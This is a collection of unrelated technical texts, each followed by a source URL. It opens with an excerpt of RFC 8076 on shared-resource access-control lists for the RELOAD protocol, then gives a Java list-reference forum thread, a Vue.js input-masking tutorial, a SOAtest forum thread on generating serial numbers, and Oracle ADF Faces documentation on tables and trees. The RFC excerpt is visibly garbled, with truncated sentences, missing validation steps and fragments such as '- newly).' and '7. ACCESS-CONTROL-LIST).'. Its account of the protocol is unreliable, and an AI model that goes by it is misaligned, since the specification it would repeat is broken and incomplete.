MUST username field (with $USER preceding and $DOMAIN succeeding the '@'). Both variables MUST be present in any given pattern definition. Furthermore, variable parts in <pattern> elements defined in the overlay configuration document MUST remain syntactically separated from the username part (e.g., by a dedicated delimiter) to prevent collisions with names of other users. If no pattern is defined for a Kind, if the "enable" attribute is false, or if the regular expression does not meet the requirements specified in this section, the

share:pattern { xsd:string }* }?

Whitespace and case processing follows the rules of [OASIS.relax_ng] and XML Schema Datatypes [W3C.REC-xmlschema-2-20041028].

6. Access Control to Shared Resources

6.1. Granting Write Access

Write access to a Kind that is intended to be shared with other RELOAD users can be initiated solely by the Resource Owner. A Resource Owner can share RELOAD Kinds by using the following procedure:

- The Resource Owner stores an ACL root item at the Resource-ID of the Shared Resource. The root item contains the ResourceNameExtension field (see Section 5.2), the username of the Resource Owner, and the Kind-ID of the Shared Resource. The allow_delegation flag is set to 1. The index of the array data structure MUST be generated as described in Section 3.1.
- Further ACL items for this Kind-ID stored by the Resource Owner MAY.
For each succeeding ACL item, the Resource Owner increments its individual index value by one (see Section 3.1) so that items can be stored in the numerical order of the array index, starting with the index of the root item. An Authorized Peer with delegation allowance ("ad"=1) can extend the access to an existing Shared Resource as follows:

- newly).

6.2. Revoking Write Access

Write permissions are revoked by storing a nonexistent value (see [RFC6940], Section 7.2.1) at the corresponding item of the Access Control List. Revoking a permission automatically invalidates all delegations performed by that user, including all subsequent delegations. This allows the invalidation of entire subtrees of the delegation tree with only a single operation. Overwriting the root item with a nonexistent value revokes all write permissions to the Shared Resource. To protect the privacy of the users, the Resource Owner SHOULD overwrite all subtrees that have been invalidated.

The validation proceeds with strings compared as binary objects, as follows:

- Obtain the username of the certificate used for signing the data stored at the Shared Resource. This is the user who requested the write operation.
-.
- Select the username of the certificate that was used to sign the ACL item obtained in the previous step.
- Validate that an item of the corresponding ACL contains a "to_user" field whose value equals the username obtained in step 3. Additionally, validate that the "ad" flag is set to 1.
- Repeat steps 3 and 4 until the "to_user" value is equal to the username of the signer of the ACL in the selected item. This final ACL item is expected to be the root item of this ACL, which MUST be further validated by verifying that the root item was signed by the owner of the ACL Resource.

, can:

- Send a Stat request to the Resource-ID of the Shared Resource to obtain all array indexes of stored ACL Kinds (as per [RFC6940], Section 7.4.3).
- document patterns.
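The chain-walking validation above can be sketched in Python. This is illustrative only: the field names to_user/ad/signed_by mirror the entries shown in Figure 1, while a real RELOAD implementation operates on signed array entries and must also match the Kind-ID, which is omitted here for brevity.

```python
# Illustrative sketch of the ACL chain validation (not RFC 8076 reference code).
def validate_write(acl_items, writer, owner):
    current = writer
    seen = set()
    while True:
        item = next((i for i in acl_items if i["to_user"] == current), None)
        if item is None:
            return False                      # no ACL entry grants access
        if current != writer and item["ad"] != 1:
            return False                      # delegators need the allow_delegation flag
        if item["signed_by"] == item["to_user"]:
            # self-signed entry: valid only if it is the Owner's root item
            return item["signed_by"] == owner
        if current in seen:
            return False                      # guard against delegation loops
        seen.add(current)
        current = item["signed_by"]           # walk one step up the trust chain

acl = [
    {"to_user": "Owner", "ad": 1, "signed_by": "Owner"},   # root item
    {"to_user": "Alice", "ad": 1, "signed_by": "Owner"},
    {"to_user": "Bob",   "ad": 0, "signed_by": "Alice"},
]
print(validate_write(acl, "Bob", "Owner"))    # True: Bob <- Alice <- Owner (root)
print(validate_write(acl, "Carol", "Owner"))  # False: no entry for Carol
```

The walk terminates either at a self-signed root item (accepted only when signed by the Resource Owner) or at a missing or non-delegating entry, which corresponds to denying the store request.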
Hence, on an inbound store request on a Kind that uses the USER-CHAIN-ACL access policy, the following rules MUST be applied:

In the USER-CHAIN-ACL policy, a given value MUST NOT be written or overwritten if neither the USER-MATCH nor the USER-NODE-MATCH (mandatory if the data model is dictionary) access policy of the base document [RFC6940] applies. Additionally, the store request MUST be denied if the signer's certificate does not contain a username that matches the user and domain portion in one of the variable resource name patterns (cf. Section 5) specified in the configuration document, or if the hashed Resource Name does not match the Resource-ID. The Resource Name of the Kind to be stored MUST be taken from the mandatory ResourceNameExtension field in the corresponding Kind data structure. If the access rights cannot be verified according to the ACL validation procedure described in Section 6.3, the store request MUST also be denied. Otherwise, the store request can be processed further.

7. ACCESS-CONTROL-LIST).

8. Security Considerations

In this section, we discuss security issues that are relevant to the usage of Shared Resources in RELOAD [RFC6940].

Trust Delegation to a Malicious or Misbehaving Peer

A Resource Owner that erroneously delegated write access to a Shared Resource for a misbehaving peer enables this malicious member of the overlay to interfere with the corresponding group application in several unwanted ways. Examples of destructive interferences range from exhausting shared storage to dedicated application-specific misuse. Additionally, a bogus peer that was granted delegation rights may authorize further malicious collaborators to write to the Shared Resource. It is the obligation of the Resource Owner to bind trust delegation to apparent trustworthiness. Additional measures to monitor proper behavior may be applied.
In any case, the Resource Owner will be able to revoke the trust delegation of an entire tree in a single overwrite operation. It further holds the right to overwrite any malicious contributions to the Shared Resource in the event of misuse.

8.4. Privacy Issues

All data stored in the Shared Resource is readable by any node in the overlay; thus, applications requiring privacy need to encrypt the data. The ACL needs to be stored unencrypted; thus, the list members of a group using a Shared Resource will always be publicly visible.

9. IANA Considerations

9.1. Access Control Policy

IANA has registered the following entry in the "RELOAD Access Control Policies" registry (cf. [RFC6940]) to represent the USER-CHAIN-ACL Access Control Policy, as described in Section 6.6.

   +-------------------+----------+
   |   Access Policy   |   RFC    |
   +-------------------+----------+
   |  USER-CHAIN-ACL   | RFC 8076 |
   +-------------------+----------+

9.2. Data Kind-ID

IANA has registered the following code point in the "RELOAD Data Kind-ID" registry (cf. [RFC6940]) to represent the ShaRe ACCESS-CONTROL-LIST Kind, as described in Section 7.

   +----------------------+------------+----------+
   |         Kind         |  Kind-ID   |   RFC    |
   +----------------------+------------+----------+
   | ACCESS-CONTROL-LIST  |    0x4     | RFC 8076 |
   +----------------------+------------+----------+

9.3. XML Namespace Registration

This document registers the following URI for the config XML namespace in the IETF XML registry defined in [RFC3688].

URI: urn:ietf:params:xml:ns:p2p:config-base:share
Registrant Contact: The IESG
XML: N/A, the requested URI is an XML namespace

10. References

10.1. Normative References

[IEEE-Posix] "IEEE Standard for Information Technology - Portable Operating System Interface (POSIX) - Part 2: Shell and Utilities (Vol. 1)", IEEE Std 1003.2-1992, ISBN 1-55937-255-9, DOI 10.1109/IEEESTD.1993.6880751, January 1993, <>.

[OASIS.relax_ng] Clark, J. and M. Murata, "RELAX NG Specification", December 2001.
[RFC6940] Jennings, C., Lowekamp, B., Ed., Rescorla, E., Baset, S., and H. Schulzrinne, "REsource LOcation And Discovery (RELOAD) Base Protocol", RFC 6940, DOI 10.17487/RFC6940, January 2014, <>.

[W3C.REC-xmlschema-2-20041028] Malhotra, A. and P. Biron, "XML Schema Part 2: Datatypes Second Edition", World Wide Web Consortium Recommendation REC-xmlschema-2-20041028, October 2004, <>.

10.2. Informative References

[RFC7904] Jennings, C., Lowekamp, B., Rescorla, E., Baset, S., Schulzrinne, H., and T. Schmidt, Ed., "A SIP Usage for REsource LOcation And Discovery (RELOAD)", RFC 7904, DOI 10.17487/RFC7904, October 2016, <>.

Acknowledgments

This work was stimulated by fruitful discussions in the P2PSIP working group and the SAM research group. We would like to thank all active members for their constructive thoughts and feedback. In particular, the authors would like to thank (in alphabetical order) Emmanuel Baccelli, Ben Campbell, Alissa Cooper, Lothar Grimm, Russ Housley, Cullen Jennings, Matt Miller, Peter Musgrave, Joerg Ott, Marc Petit-Huguenin, Peter Pogrzeba, and Jan Seedorf. This work was partly funded by the German Federal Ministry of Education and Research, projects HAMcast, Mindstone, and SAFEST.

Authors' Addresses

Alexander Knauf
HAW Hamburg
Berliner Tor 7
Hamburg D-20099
Germany
Phone: +4940428758067
Email: alexanderknauf@gmail.com

Thomas C. Schmidt
HAW Hamburg
Berliner Tor 7
Hamburg D-20099
Germany
Email: t.schmidt@haw-hamburg.de
URI:

Gabriel Hege
daviko GmbH
Schillerstr. 107
Berlin D-10625
Germany
Phone: +493043004344
Email: hege@daviko.com

Matthias Waehlisch
link-lab & FU Berlin
Hoenower Str. 35
Berlin D-10318
Germany
Email: mw@link-lab.net
URI:
https://pike.lysator.liu.se/docs/ietf/rfc/80/rfc8076.xml
list.clear() outside of <List> finalList = new ArrayList(); will delete element in finalList?

KonradZuse Sep 22, 2013 7:58 PM

Hello all! I am using 3 ArrayLists. The first is List<String>, the second is List<String[]>, and the third is a list of those lists, List<List>. I use the first list to get the string I need, but I use the second for String.split. I then need to keep a list of these to use, so I need the third List. After adding the second list to the list of lists, I want to clear it so I can set up the next list to be added, but if I do list.clear(); it will delete everything in that list. If I do not clear it, it is fine. At first I wasn't sure if it was my fault, because I'm not sure if I ever had to do that before, so I made a test case that yields the result if I change the element outside.

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package javaapplication1;

import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

/**
 *
 * @author Konrad
 */
public class JavaApplication1 {

    /**
     * @param args the command line arguments
     */
    String a;
    List<String> j = new ArrayList<>();

    public JavaApplication1() {
        a();
    }

    public void a() {
        a = "ADASDSADSA";
        j.add(a);
        a = null;
        System.out.println(j);
    }

    public static void main(String[] args) throws SQLException {
        JavaApplication1 a = new JavaApplication1();
    }
}

If I change a = null to a = ""; it still yields the original a = "ADASD......";

protected List<String> list = new ArrayList<>();
protected List<String[]> list2 = new ArrayList<>();
protected List<List> finalList = new ArrayList<>();
........
finalList.add(list2);
//list2.clear();

With this I yield an empty array element, even though my array elements exist. I tried using multiple lists and I just had multiple empty elements. So again I'm not sure if I did something wrong, or is this a bug? Since my test case worked, I'm confused. Thanks! ~KZ

1.
Re: list.clear() outside of <List> finalList = new ArrayList(); will delete element in finalList?

KonradZuse Sep 22, 2013 9:30 PM (in response to KonradZuse)

I ended up trying a bunch of things, but then realized that I could do List<String[]> list3 = new ArrayList<>(list2); and create a clone of it. I tried clone, but apparently that method doesn't exist within the (List?? ArrayList??). I understand that deleting the object will mess up anything referencing it, but I figured once something was added as an element of a list, it would stay there, as shown in the above. I guess Lists might be different, weird... Glad it works now.

2. Re: list.clear() outside of <List> finalList = new ArrayList(); will delete element in finalList?

rp0428 Sep 22, 2013 9:57 PM (in response to KonradZuse)

After adding the second list to the list of lists I want to clear it so I can set up the next list to be added, but if I do list.clear(); it will delete everything in that list.

Correct - you are just working with multiple references to the SAME set of objects. Use 'remove' to remove an element from a list and then 'add' to add it to the other list. See the Javadocs for the 'remove' method of the List interface:

E remove(int index)

Removes the element at the specified position in this list (optional operation). Shifts any subsequent elements to the left (subtracts one from their indices). Returns the element that was removed from the list.

Parameters:
    index - the index of the element to be removed
Returns:
    the element previously at the specified position
Throws:
    UnsupportedOperationException - if the remove operation is not supported by this list
    IndexOutOfBoundsException - if the index is out of range (index < 0 || index >= size())
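The behavior described in this thread comes down to reference semantics: finalList.add(list2) stores a reference to the same ArrayList object, not a snapshot of its contents, so clearing list2 also empties the element seen through finalList. A minimal, self-contained demonstration (variable names mirror the thread's):

```java
import java.util.ArrayList;
import java.util.List;

public class ReferenceDemo {

    public static int[] sizesAfterClear() {
        List<String[]> list2 = new ArrayList<>();
        list2.add(new String[]{"foo", "bar"});

        List<List<String[]>> finalList = new ArrayList<>();
        finalList.add(list2);                         // stores a REFERENCE to list2
        List<String[]> copy = new ArrayList<>(list2); // shallow copy, as in reply 1

        list2.clear(); // empties the one and only underlying list object

        return new int[]{finalList.get(0).size(), copy.size()};
    }

    public static void main(String[] args) {
        int[] sizes = sizesAfterClear();
        System.out.println(sizes[0]); // 0 -- the element inside finalList was cleared too
        System.out.println(sizes[1]); // 1 -- the copy keeps its element
    }
}
```

Note that the copy constructor makes only a shallow copy: it is a new list holding references to the same String[] entries, which is exactly enough to survive a clear() of the original list.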
https://community.oracle.com/message/11199797
One of the key aspects of any successful form is clarity. If the user finds the form easy to use and easy to understand, they are more likely to fill it in, and submit it. In this chapter, we are going to be looking at input masking. You will learn how to quickly and easily apply masks to your form inputs, and to configure them to your needs with real-life examples, such as telephone numbers.

This is an extract taken from Building Forms with Vue.js, written by Marina Mosti (@MarinaMosti). To access the code that forms the basis of the projects found throughout the book, click here. Marina is speaking at VueConf in Toronto in November. Learn more here.

What exactly are input masks?

They are predefined structures that display the data for an input. For example, if you were going to mask a telephone input, you’d probably want it to display as (123) 234-5555, instead of simply 1232345555. You can clearly see that the first example is not only easier to read, but it also conveys meaning about what the field is trying to accomplish. Input masks are a nice feature to take your UX to another level, and they are very easy to implement, thanks to open source libraries such as v-mask. The GitHub repository page can be found here.

How to install the v-mask library

Let’s get started with the installation of the v-mask library. In order for our project to use what it has to offer, we first need to add it to our project dependencies. Follow these steps in order to do this:

1. Open up your Terminal, and type in the following command to add the library to our dependencies:

> npm install v-mask

2. We need to add it to Vue as a plugin, so head to main.js, and let’s both import it, and let Vue know that we want to register it as a plugin for all of our apps. Add the following code, after the import App line:

import VueMask from 'v-mask'
Vue.use(VueMask);

Now that we have registered our plugin, we have access to a new directive: v-mask.
We can add this new directive directly onto our <input> elements, and the library will handle the masking behind the scenes by reading the users’ input, and adjusting the display of the field. Let’s try this on a regular input first, then we will add some props to our project’s component.

3. Go to App.vue, and create a new <input> element after the email input:

<input type="text" />

If we were to type in a phone number in this field as it is, we would get the default input behavior. Anything goes. So, let’s apply a telephone number mask to it. Our new v-mask library has a requirement that every field that we apply it to needs to be v-modeled, so let’s get that done first.

4. Add a new telephone prop to our data() inside of the form object:

form: {
  …
  telephone: ''
},

5. Now, go back to our new <input> element, and apply v-model. We are also going to now add the v-mask directive, shown as follows:

<input
  type="text"
  v-model="form.telephone"
  v-mask="'(###)###-####'"
>

Go back to your browser, and try the input once again. As you type, you will see that you are actually getting it nicely formatted to what we would expect for a telephone number. In five simple steps, we have added input masking to one of our form fields. Now let’s take a look in more depth at what the v-mask directive does.

What is a directive?

When we added the v-mask library to our project, and added the plugin within main.js, the library created a new directive for us, v-mask. What exactly is a directive, though? We know it looks like an HTML attribute, but what else?

Directives are special attributes with the v- prefix. Directive attribute values are expected to be a single JavaScript expression (with the exception of v-for […]). A directive’s job is to reactively apply side effects to the DOM, when the value of its expression changes. — Official Vue docs

Okay, so it looks like we have a special attribute that can modify the element.
That sounds exactly like what we saw happen when we applied it to the input element. But how does the actual expression or value that we are putting into this directive work? We know from the example that we are passing in a string, and you can see that inside the double quotes that make up the v-mask="" attribute, we are setting a new pair of single quotes ('). This means that the expression inside this attribute is JavaScript, and that we are passing it a string value. From looking at the v-mask library documentation, we know that we have a few special placeholder characters that we can use inside our masks. The table for those is as follows:

Take for example, a mask that will display the time of the day. You could define it as follows:

v-mask="'##:##'"

This means that this input will take two numbers from 0 to 9 (##), followed by a : character, followed by another two numbers (##). Anything that does not match this pattern will be ignored by the input. v-mask is a very powerful library that allows us to customize exactly how we want our input to be displayed, by combining these simple rules. In the final section of this post, we’ll look at how to modify custom inputs. This will allow us to fully leverage the power of the input masks.

How to enhance custom inputs

We have put in a lot of work to create our awesome custom BaseInput, so we definitely want to keep using it! Follow these steps in order to modify the BaseInput, and to allow for input masking:

1. Go back to App.vue, and switch the <input> element for a <BaseInput> component:

<BaseInput
  label="Telephone"
  type="text"
  v-model="form.telephone"
/>

Let’s go into BaseInput.vue now, and create a new prop; we will call it mask, and it will default to an empty string. It is important that we default it to an empty string, or else the directive will try to match, and we won’t be able to type into the fields if they don’t have a declared mask!

2.
Add it to your props object:

…,
mask: {
  type: String,
  required: false
}

3. Now, go back to App.vue, and update our telephone BaseInput to use the mask attribute:

<BaseInput
  label="Telephone"
  type="text"
  v-model="form.telephone"
  :mask="'(###)###-####'"
/>

All done! Return to your browser, and add some numbers to the field, and you should have a nice-looking telephone mask working with your custom component!
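A helpful way to understand what the directive is doing for us is to sketch the core masking idea in plain JavaScript. This is not v-mask's actual source — just a simplified, stand-alone illustration of how a '#' placeholder and literal mask characters interact:

```javascript
// Simplified sketch of mask application (illustrative, not the library's code).
function applyMask(raw, mask) {
  const placeholders = { '#': /[0-9]/, 'A': /[a-zA-Z]/, 'N': /[0-9a-zA-Z]/ };
  let out = '';
  let i = 0; // position in the raw user input
  for (const m of mask) {
    if (i >= raw.length) break;
    if (placeholders[m]) {
      // skip input characters until one matches this placeholder
      while (i < raw.length && !placeholders[m].test(raw[i])) i++;
      if (i < raw.length) out += raw[i++];
    } else {
      out += m;              // literal mask character, e.g. '(' or ':'
      if (raw[i] === m) i++; // consume it if the user typed it themselves
    }
  }
  return out;
}

console.log(applyMask('1232345555', '(###)###-####')); // (123)234-5555
console.log(applyMask('0930', '##:##'));               // 09:30
```

Anything in the input that cannot satisfy the next placeholder is simply skipped, which is why "anything goes" typing still produces a well-formed value in the field.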
https://medium.com/javascript-in-plain-english/how-to-use-v-masks-when-building-forms-with-vue-js-d623d08216c3?source=post_page-----d623d08216c3----------------------
Serial Number Generator

How to generate a series of positive integers?

Howdy folks, I'm writing SOAtest test-cases for a set of webservices which implement a "logical conversation". I need to pass a unique conversationId (as a soap-header parameter) with each service request. At the moment I'm just choosing a random number between 1 and 10,000,000 for each scenario... but (now I'm up to over a hundred scenarios) finding & resolving the inevitable collisions is getting UGLY! Please could anyone advise on how I might go about writing a serial number generator? I'm thinking of a Python (or Java) method which returns 1 the first time it is called, 2 the second time, 3 the third, and so on up to (2^31)-1... within an execution of my test-suite. Alternately, maybe the number of milliseconds since midnight (0..86,400,000) might be simpler? and do the trick just as well? Concurrency/contention is NOT an issue I think, as the test-cases will always be run synchronously, and by a single user at any one time. I was thinking I'd save my serial-number in a SOAtest variable, and then use its value in the parameterised soap-header-parameter of each request within a scenario. Where/how could I call the serial-number-generator script at the start of each scenario? Is there a scenario-init method I can hijack, or would I need to manually retrofit every scenario with an initialisation-test-case? I would appreciate any pointers in the right direction. I shall undertake some heavy googling in the meantime. Cheers all, Keith.

I recently had to create a Jython script which generated a two or three char key. (I probably have a post out here somewhere asking for help as well!) I retrofitted it to generate a random 10 character key comprised of letters and numbers. So far, it has generated U1AS2CQXKA, 515S7VL5RE, and R13QWEYPS1. I have no idea what the chances are that it would generate the same key twice, but I'd bet it's pretty slim. I have attached it for you.
Here are the bits you'll need to know when using it:

* It is Jython code.
* If you want to add lower case letters, add them to the line -> chars = String("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")
* For each char you add, you'll need to increase the 36 in the line -> i = int(Math.floor(Math.random() * 36)) by 1, so that the search through the string goes all the way to the end.
* To see it work, just run the "Test 1" step and check the return in the "Return Value->XML Data Bank (see the Literal tab)".

I'll keep working with it, but for now it just generates a single key. We might be able to change it to generate more keys, then you could do this:

Generate 100 keys
Drop them into XML Data Bank
Be accessed later in your test suite

Enjoy! BrianH

I just need integers, but your idea of a datasource got me thinking... What I'm going to try is a Java class which is-a datasource... It'll just create-or-rename a directory ./MySoaTestFilename.serialNumber.1 (for persistence) and return the next number ... Sounds easy enough. I really appreciate you volunteering your thoughts. iouBeer++ Cheers. Keith.

I reckon I'll just use System.currentTimeMillis() % 1,000,000,000 which is int-safe and surely must be distinct enough (1,000,000,000 / (1,000 * 60 * 60 * 24) = 11.5740741 days). I hadn't realised that SOAtest's Python is actually Jython. Cool as!!! Thank you. Cheers, Keith.

Method: generateConversationId

from soaptest.api import *  # Required for SOAPUtil
from java.lang import *     # Required for System, String, Math, etc.

def generateConversationId(context):
    return SOAPUtil.getXMLFromString([str(System.currentTimeMillis() % (1000*1000*1000))])

--> XML Data Bank (just rename the default z0 to conversationId)
--> Works like a charm
--> Thank you gentlemen... It's been fun.
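For readers without SOAtest at hand, both approaches from this thread can be sketched in plain Python. This uses standard CPython; the Jython script above calls java.lang.Math and java.lang.System instead, but the logic is the same:

```python
import math
import random
import time

CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

def random_key(length=10):
    # Mirrors the Jython approach: Math.floor(Math.random() * 36) picks one
    # index into the 36-character alphabet per output character.
    return "".join(CHARS[int(math.floor(random.random() * len(CHARS)))]
                   for _ in range(length))

def millis_serial():
    # The int-safe variant from the last post: milliseconds since the epoch,
    # truncated to nine digits so the result always fits in a signed 32-bit int.
    return int(time.time() * 1000) % (1000 * 1000 * 1000)

print(random_key())     # e.g. "U1AS2CQXKA"
print(millis_serial())  # a serial number below 1,000,000,000
```

Note that the millis approach only guarantees distinctness for calls more than a millisecond apart within any ~11.6-day window, which matches the thread's synchronous, single-user assumption.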
https://forums.parasoft.com/discussion/comment/5150/
This chapter describes how to display tables and trees using the ADF Faces table, tree, and treeTable components. If your application uses the Fusion technology stack, then you can use data controls to create tables and trees. For more information, see the "Creating ADF Databound Tables" and "Displaying Master-Detail Data" chapters of the Oracle Fusion Middleware Fusion Developer's Guide for Oracle Application Development Framework.

This chapter includes the following sections:

Section 10.1, "Introduction to Tables, Trees, and Tree Tables"
Section 10.2, "Displaying Data in Tables"
Section 10.3, "Adding Hidden Capabilities to a Table"
Section 10.4, "Enabling Filtering in Tables"
Section 10.5, "Displaying Data in Trees"
Section 10.6, "Displaying Data in Tree Tables"
Section 10.7, "Passing a Row as a Value"
Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars"
Section 10.9, "Exporting Data from Table, Tree, or Tree Table"
Section 10.10, "Accessing Selected Values on the Client from Components That Use Stamping"

Structured data can be displayed as tables consisting of rows and columns using the ADF Faces table component. Hierarchical data can be displayed either as tree structures using the ADF Faces tree component, or in a table format, using the ADF Faces tree table component. Instead of containing a child component for each record to be displayed, and then binding these components to the individual records, table, tree, and tree table components are bound to a complete collection, and they then repeatedly render one component (for example, an outputText component) by stamping the value for each record. For example, say a table contains two child column components. Each column displays a single attribute value for the row using an output component, and there are four records to be displayed.
Instead of binding four sets of two output components to display the data, the table itself is bound to the collection of all four records and simply stamps one set of the output components four times. As each row is stamped, the data for the current row is copied into the var attribute on the table, from which the output component can retrieve the correct values for the row. For more information about how stamping works, especially with client components, see Section 10.1.5, "Accessing Client Table, Tree, and Tree Table Components." Example 10-1 shows the JSF code for a table whose value for the var attribute is row. Each outputText component in a column displays the data for the row because its value is bound to a specific property on the variable.

Example 10-1 JSF Code for a Table Uses the var Attribute to Access Values

<af:table value="#{myBean.allEmployees}" var="row">
  <af:column>
    <af:outputText value="#{row.firstname}"/>
  </af:column>
  <af:column>
    <af:outputText value="#{row.lastname}"/>
  </af:column>
</af:table>

The table component displays simple tabular data. Each row in the table displays one object in a collection, for example one row in a database. The column component displays the value of attributes for each of the objects. For example, as shown in Figure 10-1, the Table tab in the File Explorer application uses a table to display the contents of the selected directory. The table value attribute is bound to the contentTable property of the tableContentView managed bean in the File Explorer demo. The table component provides a range of features for end users, such as sorting columns, and selecting one or more rows and then executing an application-defined action on the selected rows. It also provides a range of presentation features, such as showing grid lines and banding, row and column headers, column headers spanning groups of columns, and values wrapping within cells.
Hierarchical data (that is data that has parent/child relationships), such as the directory in the File Explorer application, can be displayed as expandable trees using the tree component. Items are displayed as nodes that mirror the parent/child structure of the data. Each top-level node can be expanded to display any child nodes, which in turn can also be expanded to display any of their child nodes. Each expanded node can then be collapsed to hide child nodes. Figure 10-2 shows the file directory in the File Explorer application, which is displayed using a tree component. Hierarchical data can also be displayed using tree table components. The tree table also displays parent/child nodes that are expandable and collapsible, but in a tabular format, which allows the page to display attribute values for the nodes as columns of data. For example, along with displaying a directory's contents using a table component, the File Explorer application has another tab that uses the tree table component to display the contents, as shown in Figure 10-3. Like the tree component, the tree table component can show the parent/child relationship between items. And like the table component, the tree table component can also show any attribute values for those items in a column. Most of the features available on a table component are also available in tree table component. You can add a toolbar and a status bar to tables, trees, and tree tables by surrounding them with the panelCollection component. The top panel contains a standard menu bar as well as a toolbar that holds menu-type components such as menus and menu options, toolbars and toolbar buttons, and status bars. Some buttons and menus are added by default. For example, when you surround a table, tree, or tree table with a panelCollection component, a toolbar that contains the View menu is added. This menu contains menu items that are specific to the table, tree, or tree table component. 
Figure 10-4 shows the tree table from the File Explorer application with the toolbar, menus, and toolbar buttons created using the panelCollection component. The table, tree, and tree table components are virtualized, meaning not all the rows that are there for the component on the server are delivered to and displayed on the client. You configure tables, trees, and tree tables to fetch a certain number of rows at a time from your data source. The data can be delivered to the components immediately upon rendering, when it is available, or lazily fetched after the shell of the component has been rendered (by default, the components fetch data when it is available). With immediate delivery, the data is fetched during the initial request. With lazy delivery, when a page contains one or more table or tree components, the page initially goes through the standard lifecycle. However, instead of fetching the data during that initial request, a special separate partial page rendering (PPR) request is run, and the number of rows set as the value of the fetch size for the table is then returned. Because the page has just been rendered, only the Render Response phase executes for the components, allowing the corresponding data to be fetched and displayed. When a user's actions cause a subsequent data fetch (for example scrolling in a table for another set of rows), another PPR request is executed. When content delivery is configured to be delivered when it is available, the framework checks for data availability during the initial request, and if it is available, it sends the data to the table, tree, or tree table. If it is not available, the data is loaded during a separate PPR request, as it is with lazy delivery. Lazy delivery should be used on pages that contain a number of components in addition to the table, tree, or tree table. Doing so allows the initial page layout and other components to be rendered first, before the data is available. Immediate delivery should be used if the table, tree, or tree table is the main focus of the page. Note, however, that only the number of rows configured to be the fetch block will be initially returned. As with lazy delivery, when a user's actions cause a subsequent data fetch, the next set of rows are delivered. The when-available delivery mode provides the additional flexibility of using immediate delivery when data is available during initial rendering, or falling back on lazy delivery when data is not initially available. The number of rows that are displayed on the client is just enough to fill the page as it is displayed in the browser. More rows are fetched as the user scrolls the component vertically. The fetchSize attribute determines the number of rows requested from the client to the server on each attempt to fill the component. The default value is 25. So if the height of the table is small, the fetch size of 25 is sufficient to fill the component. However, if the height of the component is large, there might be multiple requests for the data from the server. Therefore, the fetchSize attribute should be set to a higher number. For example, if the height of the table is 600 pixels and the height of each row is 18 pixels, you will need at least 34 rows to fill the table. With a fetchSize of 25, the table has to execute two requests to the server to fill the table. For this example, you would set the fetch size to 50. However, if you set the fetch size too high, it will impact both server and client. The server will fetch more rows from the data source than needed, and this will increase time and memory usage. On the client side, it will take longer to process those rows and attach them to the component. You can also configure the set of data that will be initially displayed using the displayRow attribute. By default, the first record in the data source is displayed in the top row or node and the subsequent records are displayed in the following rows or nodes. You can also configure the component to first display the last record in the source instead.
In this case, the last record is displayed in the bottom row or node of the component, and the user can scroll up to view the preceding records. Additionally, you can configure the component to display the selected row. This can be useful if the user is navigating to the table, and based on some parameter, a particular row will be programmatically selected. When configured to display the selected row, that row will be displayed at the top of the table and the user can scroll up or down to view other rows. You can configure selection to be either for no rows, for a single row, or for multiple rows of tables, trees, and tree tables using the rowSelection attribute. This setting allows you to execute logic against the selected rows. For example, you may want users to be able to select a row in a table or a node in a tree, and then to click a command button that navigates to another page where the data for the selected row is displayed and the user can edit it. When the selected row (or node) of a table, tree, or tree table changes, the component triggers a selection event. This event reports which rows were just deselected and which rows were just selected. While the components handle selection declaratively, if you want to perform some logic on the selected rows, you need to implement code that can access those rows and then perform the logic. You can do this in a selection listener method on a managed bean. For more information, see Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables." Note:If you configure your component to allow multiple selection, users can select one row and then press the shift key to select another row, and all the rows in between will be selected. This selection will be retained even if the selection is across multiple data fetch blocks. Similarly, you can use the Ctrl key to select rows that are not next to each other. 
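The delivery, display, and selection behaviors described above are all declared as attributes on the table tag. The following sketch combines them (the bean bindings and attribute values are illustrative; check the af:table tag reference for your ADF version):

```
<af:table value="#{myBean.employees}" var="row"
          contentDelivery="lazy"
          fetchSize="50"
          displayRow="selected"
          rowSelection="single"
          selectionListener="#{myBean.rowSelected}">
  <!-- column definitions -->
</af:table>
```

Here contentDelivery accepts immediate, lazy, or whenAvailable, and the selectionListener binding points at a hypothetical managed-bean method that receives the selection event.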
For example, if you configure your table to fetch only 25 rows at a time, but the user selects 100 rows, the framework is able to keep track of the selection.

You can choose the component used to display the actual data in a table, tree, or tree table. For example, you may want the data to be read-only, and therefore you might use an outputText component to display the data. Conversely, if you want the data to be editable, you might use an inputText component, or if choosing from a list, one of the SelectOne components. All of these components are placed as children of the column component (in the case of a table and tree table) or within the nodeStamp facet (for a tree).

When you decide to use components whose value can be edited to display your data, you can use the editingMode attribute to have the table, tree, or tree table either display all rows as available for editing at once, or display all but the currently active row as read-only. For example, Figure 10-5 shows a table whose rows can all be edited. The page renders using the components that were added to the page (for example, inputText, inputDate, and inputComboBoxListOfValues components). Figure 10-6 shows the same table (that is, it uses inputText, inputDate, and inputComboBoxListOfValues components to display the data), but configured so that only the active row displays the editable components. Users can then click on another row to make it editable (only one row is editable at a time). Note that outputText components are used to display the data in the noneditable rows, even though the same input components as in Figure 10-5 were used to build the page. The only row that actually renders those components is the active row. The currently active row is determined by the activeRowKey attribute on the table. By default, the value of this attribute is the first visible row of the table.
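The earlier note about selection surviving data fetches can be illustrated with a toy model: selection is tracked as a set of row keys, independent of whichever 25-row block happens to be fetched, so scrolling never discards it. This is a simplified sketch with made-up class and method names, not ADF's actual RowKeySet implementation:

```java
import java.util.HashSet;
import java.util.Set;

// Toy model of key-based selection: the selected keys live outside
// the currently fetched block, so fetching a new block of rows
// never loses the selection. Names here are illustrative only.
public class SelectionModel {
    private final Set<String> selectedKeys = new HashSet<>();

    public void select(String rowKey)        { selectedKeys.add(rowKey); }
    public void deselect(String rowKey)      { selectedKeys.remove(rowKey); }
    public boolean isSelected(String rowKey) { return selectedKeys.contains(rowKey); }
    public int selectedCount()               { return selectedKeys.size(); }
}
```

Because keys rather than block-relative indices are stored, a user can select 100 rows even though only 25 are fetched at a time.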
When the table (or tree or tree table) is refreshed, that component scrolls to bring the active row into view, if it is not already visible. When the user clicks on a row to edit its contents, that row becomes the active row. When you allow only a single row (or node) to be edited, the table (or tree or tree table) performs PPR when the user moves from one row (or node) to the next, thereby submitting the data (and validating that data) one row at a time. When you allow all rows to be edited, data is submitted whenever there is an event that would typically cause PPR to occur, for example scrolling beyond the currently displayed rows or nodes.

Note: You should not use more than one editable component in a column.

